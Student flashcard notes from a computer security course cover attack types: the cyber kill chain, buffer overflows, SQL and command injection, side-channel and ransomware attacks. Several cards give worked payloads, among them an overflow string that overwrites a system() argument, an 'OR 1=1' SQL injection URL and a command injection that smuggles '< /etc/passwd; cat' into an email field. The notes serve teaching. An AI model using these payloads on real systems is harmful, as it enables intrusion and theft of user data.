Notes - Computer Security MT24, Attacks

Created: October 20, 2024
Updated: January 10, 2025

Flashcards

Cyber kill chain

What are the steps in the cyber kill chain?
  1. Reconnaissance: Harvesting email addresses, conference information, etc.
  2. Weaponisation: Coupling exploit with backdoor into deliverable payload.
  3. Delivery: Delivering weaponised bundle to the victim via email, web, USB, etc.
  4. Exploitation: Exploiting a vulnerability to execute code on victim system.
  5. Installation: Installing malware on the asset.
  6. Command & Control: Command channel for remote manipulation of victim.
  7. Actions on Objectives: Accomplish original goal.

(“Really will destroy everything I can attack”)

Buffer overflows

What is a memory buffer, and what is a buffer overflow?
  • A region of physical memory allocated to temporarily store data.
  • Buffer overflows occur when data larger than the buffer size is written into it.

Say you have successful caused a buffer overflow and now have EIP control. What does this mean?
  • EIP: Extended Instruction Pointer
  • You can control what code should be executed.

What are some ways of defending against buffer overflow attacks?
  • PIE/ASLR: Randomising addresses in memory so attackers can’t jump where they want
  • NX: Preventing areas of memory like the stack from being executable
  • RELRO: Make some areas of memory read only

Assuming a simple layout of memory, how could you use a buffer overflow attack to execute arbitrary commands in the following:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void docall(char *input)
{
	char script[] = "shutdown";
	char reason[20];
	
	strcpy(reason,input);
	printf("[LOG] Restarting with reason: %s\n", reason);
	system(script);
}

int main(int argc, char **argv) {
	docall(argv[1]);
	return 0;
}

By writing a very long reason (over 20 chararacters), they could overwrite the script variable:

./simple AAAAAAAAAAAAAAAAAAAAls

@example~

Injection attacks

What is an injection attack?

When malicious code or a command is inserted into an application due to poor handling of data.

What is the difference between code and command injection?
  • Code injection: input malicious data to modify the course of execution of the program.
  • Command injection: use a vulnerable application to execute OS commands in the host.

Suppose that calling

https://example.com/accounts?id=5487

executes the following SQL:

SELECT * FROM accounts WHERE id = 5487 AND auth=1;

How could you perform an SQL injection attack here?

 
https://example.com/accounts?id=5487’+OR+1=1--

would execute the following SQL:

SELECT * FROM accounts WHERE id = 5487+OR+1=1--’ AND auth=1

and therefore reveal all user data.

@example~

Suppose that calling

http://example.com/subscribe.php?subject=join&email=me@example.com

executes the following PHP code:

system("mail -s $subject $email < /tmp/mailinglist")

How could you perform a command injection attack here?

 
http://example.com/subscribe.php?subject=join&email=me@example.com < /etc/passwd; cat

@example~

Side-channel attacks

@Define a side-channel attack and describe two variants.

Determining information about the key by observing the computer running a cryptographic algorithm.

  • Timing attacks: Measure variations in running time
  • Power attacks: Measure variations in the power drain of the CPUs

Ransomware attacks

What is the similarity between denial of service attacks and ransomware?
  • Denial of service attacks denial service, whereas
  • Ransomware attacks deny data.

@Define double extortion in the context of ransomware attacks.

Where attackers also exfiltrate the data and threaten to release it if the ransomware is not paid (on top of encrypting all the data).

Miscellaneous attacks

What is a drive-by-download attack?

Where malware is installed when a user authorises a download without understanding what is being downloaded.



Related posts